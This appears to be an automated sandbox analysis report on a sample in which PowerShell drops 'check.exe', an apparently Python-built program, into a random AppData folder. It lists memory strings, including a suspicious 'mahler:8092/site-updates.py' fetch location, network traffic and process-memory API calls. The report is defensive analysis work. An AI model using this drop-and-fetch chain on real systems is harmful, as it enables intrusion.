Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/V
Source: check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: http://www.color.org)
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
Source: check.exe, 00000005.00000002.2105400235.000001DB07E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB0801F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1882353627.000001DB08061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
Source: powershell.exe, 00000000.00000002.2086234964.000001BBCF081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: check.exe, 00000005.00000002.2103370262.000001DB077E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: check.exe, 00000005.00000002.2101879212.000001DB07350000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: check.exe, 00000005.00000002.2101666628.000001DB05A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
Source: powershell.exe, 00000000.00000002.2086234964.000001BBCF2A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/giampaolo/psutil/issues/875.
Source: check.exe, 00000005.00000002.2128958771.000001DB0862C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1836530909.000001DB075A7000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1837728642.000001DB0759D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: check.exe, 00000005.00000003.1839009875.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840262827.000001DB07A20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1843045701.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07998000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840325932.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1840368079.000001DB079A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839110774.000001DB07A9E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB07A1C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839088287.000001DB07A1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: check.exe, 00000005.00000002.2103110427.000001DB07580000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
Source: powershell.exe, 00000000.00000002.2086234964.000001BBD04D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
Source: check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
Source: check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
Source: check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07D20000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2128958771.000001DB08654000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07ED3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
Source: check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
Source: check.exe, 00000005.00000002.2105260478.000001DB07C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zip
Source: check.exe, 00000005.00000002.2109465254.000001DB08340000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
Source: check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
Source: check.exe, 00000005.00000002.2103701142.000001DB078E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1889998402.000001DB07F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
Source: check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
Source: check.exe, 00000005.00000003.1840368079.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1833669467.000001DB07581000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1839250636.000001DB079E2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105029843.000001DB07B00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
Source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
Source: check.exe, 00000005.00000002.2128958771.000001DB085A0000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://requests.readthedocs.io
Source: check.exe, 00000005.00000002.2152722468.000001DB08EA4000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0801F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: check.exe, 00000005.00000002.2105400235.000001DB07D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: check.exe, 00000005.00000002.2103701142.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB07A9D000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844084262.000001DB07E1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
Source: check.exe, 00000005.00000002.2105400235.000001DB07F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
Source: check.exe, 00000005.00000002.2107343749.000001DB08240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311F00000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: check.exe, 00000005.00000002.2173500044.00007FFBA1344000.00000002.00000001.01000000.0000001A.sdmp, check.exe, 00000005.00000002.2183903299.00007FFBA98D0000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: https://www.openssl.org/H
Source: check.exe, 00000005.00000002.2103701142.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1844904780.000001DB079F0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.1845563446.000001DB079F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org
Source: check.exe, 00000005.00000002.2105400235.000001DB07E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
Source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://www.python.org/psf/license/)
Source: check.exe, 00000005.00000002.2105400235.000001DB07EA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/
Source: check.exe, 00000005.00000003.1882353627.000001DB080C4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB0804B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: check.exe, 00000005.00000002.2103110427.000001DB075E3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2105400235.000001DB07E93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD61E90 PyList_New,GetActiveProcessorCount,PyErr_SetFromWindowsErr,_Py_Dealloc,free,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,PyExc_RuntimeError,PyErr_SetString,malloc,PyErr_NoMemory,NtQuerySystemInformation,Py_BuildValue,PyList_Append,_Py_Dealloc,free,_Py_Dealloc,16_2_00007FFB9DD61E90
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD62480 GetActiveProcessorCount,PyErr_SetFromWindowsErr,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,PyExc_RuntimeError,PyErr_SetString,malloc,PyErr_NoMemory,NtQuerySystemInformation,free,malloc,PyErr_NoMemory,NtQuerySystemInformation,malloc,PyErr_NoMemory,NtQuerySystemInformation,free,free,free,free,free,Py_BuildValue,16_2_00007FFB9DD62480
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD67480 malloc,NtQuerySystemInformation,free,malloc,PyErr_NoMemory,free,free,16_2_00007FFB9DD67480
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD66E80 PyExc_RuntimeError,PyErr_SetString,OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,CloseHandle,calloc,PyErr_NoMemory,CloseHandle,NtQueryInformationProcess,calloc,PyErr_NoMemory,free,CloseHandle,wcscpy_s,free,CloseHandle,16_2_00007FFB9DD66E80
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD66290 GetProcessHeap,HeapAlloc,GetFileType,SetLastError,NtQueryObject,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,PyErr_NoMemory,GetProcessHeap,HeapFree,16_2_00007FFB9DD66290
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD65760 PyArg_ParseTuple,OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,Py_BuildValue,16_2_00007FFB9DD65760
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD64D40 PyArg_ParseTuple,OpenProcess,GetLastError,PyObject_IsTrue,NtSuspendProcess,NtResumeProcess,CloseHandle,_Py_NoneStruct,_Py_NoneStruct,16_2_00007FFB9DD64D40
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD66640 PyList_New,EnterCriticalSection,GetProcessHeap,HeapAlloc,PyErr_NoMemory,_Py_Dealloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,PyExc_RuntimeError,PyErr_SetString,GetCurrentProcess,DuplicateHandle,PyUnicode_FromWideChar,PyList_Append,_Py_Dealloc,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,_Py_Dealloc,GetProcessHeap,HeapFree,LeaveCriticalSection,16_2_00007FFB9DD66640
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD65850 PyArg_ParseTuple,OpenProcess,GetLastError,NtSetInformationProcess,CloseHandle,_Py_NoneStruct,_Py_NoneStruct,16_2_00007FFB9DD65850
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD66AE0 OpenProcess,GetLastError,NtQueryInformationProcess,RtlNtStatusToDosErrorNoTeb,PyErr_SetFromWindowsErrWithFilename,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,ReadProcessMemory,NtQueryInformationProcess,CloseHandle,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,GetLastError,PyErr_SetFromWindowsErrWithFilename,CloseHandle,calloc,PyErr_NoMemory,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,free,CloseHandle,16_2_00007FFB9DD66AE0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD646C0 PyArg_ParseTuple,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,Py_BuildValue,PyUnicode_FromWideChar,GetProcessHeap,HeapFree,PyErr_NoMemory,16_2_00007FFB9DD646C0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD64AB0 PyArg_ParseTuple,OpenProcess,GetLastError,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,PyExc_RuntimeError,PyErr_SetString,CloseHandle,PyErr_Clear,GetProcessHeap,HeapFree,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,Py_BuildValue,PyErr_NoMemory,CloseHandle,16_2_00007FFB9DD64AB0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD62B00: PyDict_New,swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,Py_BuildValue,PyDict_SetItemString,_Py_Dealloc,CloseHandle,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,__acrt_iob_func,fprintf,GetLastError,__acrt_iob_func,fprintf,__acrt_iob_func,PyErr_SetFromWindowsErr,_Py_Dealloc,_Py_Dealloc,CloseHandle,16_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E10004_2_00007FF61E8E1000
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E905C004_2_00007FF61E905C00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E89E04_2_00007FF61E8E89E0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E9069644_2_00007FF61E906964
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E98004_2_00007FF61E8E9800
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F17404_2_00007FF61E8F1740
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F1F604_2_00007FF61E8F1F60
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F87944_2_00007FF61E8F8794
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E9008C84_2_00007FF61E9008C8
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F80E44_2_00007FF61E8F80E4
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E9018744_2_00007FF61E901874
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E9040AC4_2_00007FF61E9040AC
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F1D544_2_00007FF61E8F1D54
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8FE5704_2_00007FF61E8FE570
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F35A04_2_00007FF61E8F35A0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8FDEF04_2_00007FF61E8FDEF0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E9097284_2_00007FF61E909728
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E905E7C4_2_00007FF61E905E7C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F9EA04_2_00007FF61E8F9EA0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F2C104_2_00007FF61E8F2C10
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E903C104_2_00007FF61E903C10
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E9008C84_2_00007FF61E9008C8
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E9064184_2_00007FF61E906418
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F1B504_2_00007FF61E8F1B50
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F5D304_2_00007FF61E8F5D30
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8EA4744_2_00007FF61E8EA474
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8EACAD4_2_00007FF61E8EACAD
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F19444_2_00007FF61E8F1944
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F21644_2_00007FF61E8F2164
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8F39A44_2_00007FF61E8F39A4
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8EA2DB4_2_00007FF61E8EA2DB
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8FDA5C4_2_00007FF61E8FDA5C
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD61E9016_2_00007FFB9DD61E90
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD62E7016_2_00007FFB9DD62E70
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD6397016_2_00007FFB9DD63970
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD6664016_2_00007FFB9DD66640
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD69A4016_2_00007FFB9DD69A40
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD64E3016_2_00007FFB9DD64E30
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD62B0016_2_00007FFB9DD62B00
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD68FA016_2_00007FFB9DD68FA0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: String function: 00007FF61E8E2710 appears 52 times
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: String function: 00007FFB9DD61D70 appears 39 times
